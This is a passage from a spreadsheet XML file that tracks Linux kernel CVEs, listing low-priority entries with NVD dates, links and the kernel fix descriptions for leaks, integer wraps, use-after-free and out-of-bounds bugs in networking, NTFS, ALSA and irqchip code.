      <c r="R475" s="5" t="inlineStr"/>
      <c r="S475" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: free pending qentry in smc_llc_flow_stop() before memset
smc_llc_flow_stop() resets a flow struct with a blind memset:
	spin_lock_bh(&amp;lgr-&gt;llc_flow_lock);
	memset(flow, 0, sizeof(*flow));
	flow-&gt;type = SMC_LLC_FLOW_NONE;
	spin_unlock_bh(&amp;lgr-&gt;llc_flow_lock);
If flow-&gt;qentry is non-NULL at this point the pointer is overwritten without the
allocation being freed, leaking one kmalloc object.
A late-arriving duplicate CONFIRM_LINK or ADD_LINK_CONT message can set
flow-&gt;qentry after the legitimate message has been consumed by the waiter via
smc_llc_flow_qentry_clr() (which NULLs the pointer but leaves flow-&gt;type
non-zero) but before the flow completes and smc_llc_flow_stop() runs.  In that
window the duplicate is stashed into flow-&gt;qentry, and then lost when
smc_llc_flow_stop() zeros the struct.
Call smc_llc_flow_qentry_del() inside the lock before the memset.
smc_llc_flow_qentry_del() already checks flow-&gt;qentry before freeing, so the
normal case where no entry is pending is a no-op.</t>
        </is>
      </c>
      <c r="T475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90107</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90108</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2026-09-17</t>
        </is>
      </c>
      <c r="P476" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q476" s="5" t="inlineStr"/>
      <c r="R476" s="5" t="inlineStr"/>
      <c r="S476" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: free stashed qentry before overwrite in REQ_ADD_LINK to ADD_LINK transition
When smc_llc_event_handler() transitions the local LLC flow from
SMC_LLC_FLOW_REQ_ADD_LINK to SMC_LLC_FLOW_ADD_LINK on arrival of an ADD_LINK
request, it calls smc_llc_flow_qentry_set() unconditionally:
	if (lgr-&gt;llc_flow_lcl.type == SMC_LLC_FLOW_REQ_ADD_LINK) {
		lgr-&gt;llc_flow_lcl.type = SMC_LLC_FLOW_ADD_LINK;
		smc_llc_flow_qentry_set(&amp;lgr-&gt;llc_flow_lcl, qentry);
		...
	}
A CONFIRM_LINK or ADD_LINK_CONT arriving while flow-&gt;type is
SMC_LLC_FLOW_REQ_ADD_LINK is stashed into flow-&gt;qentry via the
SMC_LLC_CONFIRM_LINK / SMC_LLC_ADD_LINK_CONT handler (which stores into
flow-&gt;qentry for any non-NONE flow type).  When the subsequent ADD_LINK
arrives, the REQ_ADD_LINK branch overwrites flow-&gt;qentry with the new pointer
without first freeing the stashed allocation, leaking one kmalloc object.
The stashed entry has no consumer: smc_llc_wait() is only called from
llc_add_link_work, which is not yet scheduled while the flow type remains
REQ_ADD_LINK.  No waiter is sleeping on llc_msg_waiter at this point.
It is safe to unconditionally free any stashed qentry before
the overwrite.
Call smc_llc_flow_qentry_del() before smc_llc_flow_qentry_set() in the
REQ_ADD_LINK branch.  smc_llc_flow_qentry_del() already checks flow-&gt;qentry
before freeing, so the normal path where no entry is stashed is a no-op.</t>
        </is>
      </c>
      <c r="T476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90108</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90109</t>
        </is>
      </c>
      <c r="D477" s="5" t="inlineStr"/>
      <c r="E477" s="5" t="inlineStr"/>
      <c r="F477" s="5" t="inlineStr"/>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="inlineStr"/>
      <c r="I477" s="5" t="inlineStr"/>
      <c r="J477" s="5" t="inlineStr"/>
      <c r="K477" s="5" t="inlineStr"/>
      <c r="L477" s="5" t="inlineStr"/>
      <c r="M477" s="5" t="inlineStr"/>
      <c r="N477" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O477" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P477" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q477" s="5" t="inlineStr"/>
      <c r="R477" s="5" t="inlineStr"/>
      <c r="S477" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: sched: fix 32-bit backlog wrap in gred, bfifo and plug enqueue
gred_enqueue(), bfifo_enqueue() and plug_enqueue() admit a packet when the
current backlog plus the packet length fits within the queue limit:
  sch-&gt;qstats.backlog + qdisc_pkt_len(skb) &lt;= sch-&gt;limit (gred default VQ)
  gred_backlog+qdisc_pkt_len(skb) &lt;= q-&gt;limit  (gred configured VQ)
  sch-&gt;qstats.backlog + qdisc_pkt_len(skb) &lt;= sch-&gt;limit (bfifo)
  sch-&gt;qstats.backlog + skb-&gt;len &lt;= q-&gt;limit             (plug)
sch-&gt;qstats.backlog and q-&gt;backlog are u32, and qdisc_pkt_len()/skb-&gt;len
are unsigned int, so all sums are computed in 32 bits and wrap at 2^32.
Once the true backlog exceeds 4 GiB the wrapped sum becomes small and
admission keeps succeeding, so the queue grows without bound and the kernel
can be driven to OOM.
Promote the sums to u64 so admission stops once the true backlog exceeds
the limit.  The limit is u32, so the bounded queue stays below 2^32 and
the stored u32 backlog never wraps.
The bug can only be reproduced as root (albeit with ridiculous setup):
 attach a gred (or bfifo/plug) qdisc with a limit near 4 GiB,
 leaving the default VQ unconfigured (for gred), and drive &gt;4 GiB of
 queued traffic (e.g. via a size table / stab to inflate qdisc_pkt_len,
 or sustained high-rate traffic). The u32 backlog+len sum wraps at 2^32,
 admission keeps succeeding, and the queue grows unboundedly to OOM.</t>
        </is>
      </c>
      <c r="T477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90109</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90110</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2026-09-17</t>
        </is>
      </c>
      <c r="P478" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q478" s="5" t="inlineStr"/>
      <c r="R478" s="5" t="inlineStr"/>
      <c r="S478" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
inetpeer: randomize RB-tree node comparison using SipHash
The inetpeer rate limiting system stores peer entries in a Red-Black tree
keyed deterministically on the remote IP address. Because tree lookups walk
the RB-tree using standard lexicographical comparisons (inetpeer_addr_cmp),
an off-path adversary can predict the exact topology of the tree and the
sequence of nodes traversed during lookups (the gc_stack candidate list).
By combining deterministic tree traversal with aggressive garbage collection
(triggered when tree size exceeds inet_peer_threshold), an attacker can
selectively force the eviction of targeted inet_peer nodes. When an evicted
node is subsequently re-created upon receiving a new packet, its rate-limiting
token bucket (rate_tokens, rate_last) is reset to full capacity. This creates
a side-channel primitive allowing off-path attackers to bypass IP-keyed ICMP
rate limits and infer open UDP ports (similar to SAD DNS style attacks).
Mitigate this by randomizing the RB-tree node comparison logic using SipHash
with a secret key (inetpeer_hash_key) initialized via net_get_random_once().
Nodes are ordered in the tree by SipHash(addr, key) rather than raw IP
addresses. Because the secret key is unknown to external entities, the tree
layout and lookup traversal paths are unpredictable to off-path adversaries,
breaking the deterministic eviction gadget.
Cache the computed 64-bit SipHash (hash) in struct inet_peer and compute the
target hash (dhash) once at the beginning of inet_getpeer() to avoid recomputing
SipHash at every step of the RB-tree walk.</t>
        </is>
      </c>
      <c r="T478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90110</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90111</t>
        </is>
      </c>
      <c r="D479" s="5" t="inlineStr"/>
      <c r="E479" s="5" t="inlineStr"/>
      <c r="F479" s="5" t="inlineStr"/>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="inlineStr"/>
      <c r="I479" s="5" t="inlineStr"/>
      <c r="J479" s="5" t="inlineStr"/>
      <c r="K479" s="5" t="inlineStr"/>
      <c r="L479" s="5" t="inlineStr"/>
      <c r="M479" s="5" t="inlineStr"/>
      <c r="N479" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O479" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P479" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q479" s="5" t="inlineStr"/>
      <c r="R479" s="5" t="inlineStr"/>
      <c r="S479" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ip6mr: do not clone dst in ip6mr_cache_report()
IPv6 input attaches a non-refcounted (NOREF) dst to skbs under RCU.
When an ingress multicast packet misses MFC lookup,
ip6mr_cache_unresolved() places the skb onto the unresolved queue,
escaping the receive-side RCU grace period.
If the underlying route is deleted and freed, and the MFC queue is later
resolved with a wrong parent interface, ip6_mr_forward() invokes
ip6mr_cache_report(..., MRT6MSG_WRONGMIF), which executes
dst_clone(skb_dst(pkt)) on the freed dst entry, triggering a slab
use-after-free.
Report packets queued to mroute6_sk (a raw socket) and netlink
notifications do not require an attached dst entry.
Fix this by:
1. Removing dst_clone() in ip6mr_cache_report() and ensuring report skbs
   do not hold a dst.
2. Dropping skb_dst before queuing unresolved skbs in
   ip6mr_cache_unresolved(), matching the fact that multicast
   forwarding resolves outgoing routes anew via ip6_route_output().</t>
        </is>
      </c>
      <c r="T479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90111</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90112</t>
        </is>
      </c>
      <c r="D480" s="5" t="inlineStr"/>
      <c r="E480" s="5" t="inlineStr"/>
      <c r="F480" s="5" t="inlineStr"/>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="inlineStr"/>
      <c r="I480" s="5" t="inlineStr"/>
      <c r="J480" s="5" t="inlineStr"/>
      <c r="K480" s="5" t="inlineStr"/>
      <c r="L480" s="5" t="inlineStr"/>
      <c r="M480" s="5" t="inlineStr"/>
      <c r="N480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O480" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P480" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q480" s="5" t="inlineStr"/>
      <c r="R480" s="5" t="inlineStr"/>
      <c r="S480" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: qlcnic: validate unified ROM sections before loading
The unified ROM parser reads directory, product, and data-descriptor fields
from the firmware file.  Existing validation forms table and data ends with
unchecked additions and multiplications.  Malformed values can wrap before
they are compared with the firmware size.  The parser also dereferences
typed pointers at firmware-controlled offsets.
Valid descriptor extents alone are insufficient for the consumers.  The
loader reads a fixed-size bootloader regardless of its declared size, the
version parser assumes a 17-byte tail, and a partial final firmware word is
read as a full u64.  A truncated image can therefore make the driver read
beyond the firmware allocation during validation or loading.
Replace the pointer-returning parser with bounded range helpers.  Validate
table entry sizes, descriptor indices, section ranges, the fixed
bootloader load length, and the version tail before exposing any section.
Read all file fields with unaligned little-endian accessors and assemble a
partial final word from only the bytes that remain.  Apply the same range
checks to the legacy image before reading its fixed fields.</t>
        </is>
      </c>
      <c r="T480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90112</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90113</t>
        </is>
      </c>
      <c r="D481" s="5" t="inlineStr"/>
      <c r="E481" s="5" t="inlineStr"/>
      <c r="F481" s="5" t="inlineStr"/>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="inlineStr"/>
      <c r="I481" s="5" t="inlineStr"/>
      <c r="J481" s="5" t="inlineStr"/>
      <c r="K481" s="5" t="inlineStr"/>
      <c r="L481" s="5" t="inlineStr"/>
      <c r="M481" s="5" t="inlineStr"/>
      <c r="N481" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O481" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P481" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q481" s="5" t="inlineStr"/>
      <c r="R481" s="5" t="inlineStr"/>
      <c r="S481" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netdevsim: update queue NAPI association on queue reset
In netdevsim, receive queues (struct nsim_rq) embed their own struct
napi_struct. When queue reset is performed (e.g. via queue_reset
debugfs), nsim_queue_start() swaps in a newly allocated struct nsim_rq,
and nsim_queue_mem_free() later deletes and frees the old one.
However, nsim_queue_start() failed to update the queue-to-NAPI mapping
via netif_queue_set_napi(). As a result, dev-&gt;_rx[idx].napi continued to
point to the old NAPI struct. After the old queue was freed, a subsequent
queue dump via Netlink (NETDEV_CMD_QUEUE_GET) triggered a KASAN
slab-use-after-free read in nla_put_napi_id() when accessing
rxq-&gt;napi-&gt;napi_id.
Fix this by calling netif_queue_set_napi() in nsim_queue_start() to
associate the new NAPI with the RX queue, and clear the association
with netif_queue_set_napi(..., NULL) in nsim_del_napi() during teardown.</t>
        </is>
      </c>
      <c r="T481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90113</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90114</t>
        </is>
      </c>
      <c r="D482" s="5" t="inlineStr"/>
      <c r="E482" s="5" t="inlineStr"/>
      <c r="F482" s="5" t="inlineStr"/>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="inlineStr"/>
      <c r="I482" s="5" t="inlineStr"/>
      <c r="J482" s="5" t="inlineStr"/>
      <c r="K482" s="5" t="inlineStr"/>
      <c r="L482" s="5" t="inlineStr"/>
      <c r="M482" s="5" t="inlineStr"/>
      <c r="N482" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O482" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P482" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q482" s="5" t="inlineStr"/>
      <c r="R482" s="5" t="inlineStr"/>
      <c r="S482" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: bridge: Reject descending VLAN tunnel ranges
A pair of descending VLAN and tunnel IDs can pass the tunnel range span
check. The VLAN subtraction produces a negative int, which is converted
to unsigned when compared with the u32 tunnel ID subtraction. It can
therefore equal the wrapped tunnel ID delta.
The range loop then performs no iterations. Since the batched
notification handling added a post-loop error check, this leaves err
uninitialized and makes the request's return value unpredictable.
Reject descending VLAN ranges before comparing the spans. Valid
ascending and single-entry ranges remain unchanged, while malformed
descending ranges consistently return -EINVAL.
This issue was found by a static analysis checker and confirmed by
manual source review.</t>
        </is>
      </c>
      <c r="T482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90114</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90115</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2026-09-17</t>
        </is>
      </c>
      <c r="P483" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q483" s="5" t="inlineStr"/>
      <c r="R483" s="5" t="inlineStr"/>
      <c r="S483" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xsk: fix NULL pointer dereference in __xsk_rcv()
In the __xsk_rcv() multi-buffer path, xsk_buff_alloc() is called in a
loop without checking its return value. xsk_buff_can_alloc() only
counts fill queue entries without validating their addresses, so it
can succeed while xsk_buff_alloc() rejects all remaining entries and
returns NULL.
  Oops: general protection fault, probably for non-canonical address
   0xdffffc0000000000
  KASAN: null-ptr-deref in range
   [0x0000000000000000-0x0000000000000007]
  RIP: 0010:__xsk_rcv+0x426/0xc20 (net/xdp/xsk.c:350)
  Call Trace:
   xsk_generic_rcv+0x26d/0x5f0
   xdp_do_generic_redirect+0x3c5/0xcf0
   do_xdp_generic+0x92f/0xe70
   __netif_receive_skb_core.constprop.0+0xf7e/0x2b30
Fix this with a two-stage transaction. First allocate and stage all
buffers required for the packet, recycling all staged buffers with
xsk_buff_free() if any allocation fails. Only after this stage
succeeds, copy the data, reserve the RX descriptors, and release the
buffers in an error-free loop.</t>
        </is>
      </c>
      <c r="T483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90115</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90116</t>
        </is>
      </c>
      <c r="D484" s="5" t="inlineStr"/>
      <c r="E484" s="5" t="inlineStr"/>
      <c r="F484" s="5" t="inlineStr"/>
      <c r="G484" s="5" t="inlineStr"/>
      <c r="H484" s="5" t="inlineStr"/>
      <c r="I484" s="5" t="inlineStr"/>
      <c r="J484" s="5" t="inlineStr"/>
      <c r="K484" s="5" t="inlineStr"/>
      <c r="L484" s="5" t="inlineStr"/>
      <c r="M484" s="5" t="inlineStr"/>
      <c r="N484" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O484" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P484" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q484" s="5" t="inlineStr"/>
      <c r="R484" s="5" t="inlineStr"/>
      <c r="S484" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: mtpav: shut down output timer before card teardown
snd_mtpav_output_timer() rearms chip-&gt;timer while holding
chip-&gt;spinlock and accesses the card-private mtpav state.
snd_mtpav_free() currently takes the same lock and calls
timer_delete() when the timer is active. This only removes a
pending timer; it does not wait for a callback that is already
running and does not prevent the callback from rearming the timer.
A callback running on another CPU can therefore continue after
snd_mtpav_free() releases the lock and access the card-private
state while the card is being torn down. It can also rearm the
timer after timer_delete() has returned.
Call timer_shutdown_sync() without holding chip-&gt;spinlock. This
waits for any running callback to finish and prevents further
rearming before the card-private mtpav state is released.</t>
        </is>
      </c>
      <c r="T484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90116</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90117</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2026-09-17</t>
        </is>
      </c>
      <c r="P485" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q485" s="5" t="inlineStr"/>
      <c r="R485" s="5" t="inlineStr"/>
      <c r="S485" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: validate usa_ofs before preserving the update sequence number
When ntfs_mft_record_alloc() reuses a free mft record it reads the old
update sequence number straight from the on-disk record:
     usn = *(__le16 *)((u8 *)m + le16_to_cpu(m-&gt;usa_ofs));
Here m points into the raw $MFT page-cache folio, which still holds
unvalidated, MST-protected bytes: the folio is read by a plain
iomap_read_folio() and neither post_read_mst_fixup() nor
ntfs_mft_record_check() has run on it (both work on private copies).
m-&gt;usa_ofs is therefore an untrusted u16, and a corrupted record can put
it past the end of the record so the two-byte read lands outside the
folio.  Reading such a record while creating a file gives, under KASAN:
   BUG: KASAN: use-after-free in ntfs_mft_record_alloc+...
   Read of size 2 at addr ...
    ntfs_mft_record_alloc -&gt; __ntfs_create -&gt; ntfs_create -&gt; path_openat
Only preserve the old update sequence number when usa_ofs is even and in
range, mirroring the check ntfs_mft_record_check() already applies;
otherwise leave usn zero, which the existing restore below skips.</t>
        </is>
      </c>
      <c r="T485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90117</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90118</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2026-09-17</t>
        </is>
      </c>
      <c r="P486" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q486" s="5" t="inlineStr"/>
      <c r="R486" s="5" t="inlineStr"/>
      <c r="S486" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: fix off-by-one page overflow in ntfs_decompress()
The per-token range check in ntfs_decompress() uses
	if (cb &gt;= cb_sb_end || dp_addr &gt; dp_sb_end)
		break;
so dp_addr == dp_sb_end falls through to the symbol copy
`*dp_addr++ = *cb++`, writing one byte past the destination page.  Since
NTFS_SB_SIZE == PAGE_SIZE the destination is a single page, so the byte
lands in the adjacent page, and *dest_ofs is left one past the sub-block
end (the later `*dest_ofs &amp;= ~PAGE_MASK` then yields 1, not 0, so the page
is never finalized and later sub-blocks keep writing further past it).  A
corrupted compressed $DATA attribute thus produces a bounded run of
out-of-bounds writes when the file is read.
Break as soon as dp_addr reaches dp_sb_end; a full sub-block still
completes, as its final copy advances dp_addr to exactly dp_sb_end.</t>
        </is>
      </c>
      <c r="T486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90118</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90119</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2026-09-17</t>
        </is>
      </c>
      <c r="P487" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q487" s="5" t="inlineStr"/>
      <c r="R487" s="5" t="inlineStr"/>
      <c r="S487" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: ice1712: Fix the card leak at probe error with the auto-cleanup
snd_ice1712_probe() performs multiple initialization steps after
snd_card_new(), but directly returns on failures from later steps
without releasing the ALSA card, causing resource leaks when
probing fails.
Use snd_devm_card_new() together with scope-based cleanup
via __free(snd_card_unref), and clear the card pointer after
successful registration to keep it alive.</t>
        </is>
      </c>
      <c r="T487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90119</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90120</t>
        </is>
      </c>
      <c r="D488" s="5" t="inlineStr"/>
      <c r="E488" s="5" t="inlineStr"/>
      <c r="F488" s="5" t="inlineStr"/>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="inlineStr"/>
      <c r="I488" s="5" t="inlineStr"/>
      <c r="J488" s="5" t="inlineStr"/>
      <c r="K488" s="5" t="inlineStr"/>
      <c r="L488" s="5" t="inlineStr"/>
      <c r="M488" s="5" t="inlineStr"/>
      <c r="N488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O488" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P488" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q488" s="5" t="inlineStr"/>
      <c r="R488" s="5" t="inlineStr"/>
      <c r="S488" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
irqchip/gic-v5: Check get_logical_index() return value in MADT IAFFID parsing
In gic_acpi_parse_iaffid() a given MADT GICC entry might not correspond
to a logical cpu recognized by the kernel, resulting in the cpu variable
initialization to an error value.
Currently, the get_logical_index() return value is not checked for failure,
which might result in out-of-bounds memory corruption while trying to
index a per_cpu variable array.
Add a check to evaluate get_logical_index() return value.</t>
        </is>
      </c>
      <c r="T488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90120</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90121</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2026-09-17</t>
        </is>
      </c>
      <c r="P489" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q489" s="5" t="inlineStr"/>
      <c r="R489" s="5" t="inlineStr"/>
      <c r="S489" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
irqchip/gic-v5: Clear per-CPU IRS data on teardown
IRS affinity setup publishes an IRS pointer and IAFFID state in the
per-CPU data before the remaining IRS initialization can fail. The
error path then frees the IRS data without clearing that published
state, leaving CPUs associated with freed memory.
On initialization failure and normal IRS teardown, clear the per-CPU
IRS association by removing the stale pointer to irs_data. Also
invalidate the per-CPU IAFFID state for any CPUs that were tied to the
IRS before it was freed.</t>
        </is>
      </c>
      <c r="T489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90121</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90122</t>
        </is>
      </c>
      <c r="D490" s="5" t="inlineStr"/>
      <c r="E490" s="5" t="inlineStr"/>
      <c r="F490" s="5" t="inlineStr"/>
      <c r="G490" s="5" t="inlineStr"/>
      <c r="H490" s="5" t="inlineStr"/>
      <c r="I490" s="5" t="inlineStr"/>
      <c r="J490" s="5" t="inlineStr"/>
      <c r="K490" s="5" t="inlineStr"/>
      <c r="L490" s="5" t="inlineStr"/>
      <c r="M490" s="5" t="inlineStr"/>
      <c r="N490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O490" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P490" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q490" s="5" t="inlineStr"/>
      <c r="R490" s="5" t="inlineStr"/>
      <c r="S490" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
clk: visconti: Make sure clk_init_data is fully initialized
The clk_init_data structure contains several mutually-exclusive members
for different methods to specify the possible parents of a clock,
prompting drivers to initialize only the members they need.  However,
not initializing all members may cause subtle issues, which are only
exposed when CONFIG_INIT_STACK_ALL_PATTERN or CONFIG_INIT_STACK_NONE is
enabled.
